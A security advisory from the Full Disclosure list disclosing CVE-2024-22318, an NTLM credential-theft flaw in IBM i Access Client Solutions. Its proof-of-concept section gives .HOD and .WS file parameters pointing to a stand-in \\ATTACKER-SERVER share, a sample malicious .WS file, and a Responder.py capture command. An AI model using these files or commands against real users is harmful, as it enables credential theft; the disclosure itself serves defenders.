IBM i Access Client Solutions / Remote Credential Theft / CVE-2024-22318
2024-2-14 10:16:15 Author: seclists.org(查看原文) 阅读量:15 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: hyp3rlinx <apparitionsec () gmail com>
Date: Thu, 8 Feb 2024 21:23:40 -0500

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.ibm.com

[Product]
IBM i Access Client Solutions

[Versions]
All

[Remediation/Fixes]
None

[Vulnerability Type]
Remote Credential Theft

[CVE Reference]
CVE-2024-22318


[Security Issue]
IBM i Access Client Solutions (ACS) is vulnerable to remote credential
theft when NT LAN Manager (NTLM) is enabled on Windows workstations.
Attackers can create UNC capable paths within ACS 5250 display terminal
configuration ".HOD" or ".WS" files to point to a hostile server. If NTLM
is enabled and the user opens an attacker supplied file the Windows
operating system will try to authenticate using the current user's session.
The attacker controlled server could then capture the NTLM hash information
to obtain the user's credentials.


[References]
https://www.ibm.com/support/pages/node/7116091


[Exploit/POC]
The client access .HOD File vulnerable parameters:

1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c

[KeyRemapFile]
2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c

Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv

The client access legacy .WS File vulnerable parameters:
DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c

Example, client access older .WS file

[Profile]
ID=WS
Version=9
[Telnet5250]
AssociatedPrinterStartMinimized=N
AssociatedPrinterTimeout=0
SSLClientAuthentication=Y
HostName=PWN
AssociatedPrinterClose=N
Security=CA400
CertSelection=AUTOSELECT
AutoReconnect=Y
[KeepAlive]
KeepAliveTimeOut=0
[Keyboard]
IBMDefaultKeyboard=N
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c
[Communication]
Link=telnet5250


[Network Access]
Remote


[Severity]
Medium


[Disclosure Timeline]
Vendor Notification:  December 14, 2023
Vendor Addresses Issue: February 7, 2024
February 8, 2024 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. Permission is
hereby granted for the redistribution of this advisory, provided that it is
not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author. The author is not
responsible for any misuse of the information contained herein and accepts
no responsibility for any damage caused by the use or misuse of this
information. The author prohibits any malicious use of security related
information or exploits by the author or elsewhere. All content (c).

hyp3rlinx
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Current thread:

  • IBM i Access Client Solutions / Remote Credential Theft / CVE-2024-22318 hyp3rlinx (Feb 13)

文章来源: https://seclists.org/fulldisclosure/2024/Feb/7
如有侵权请联系:admin#unsafe.sh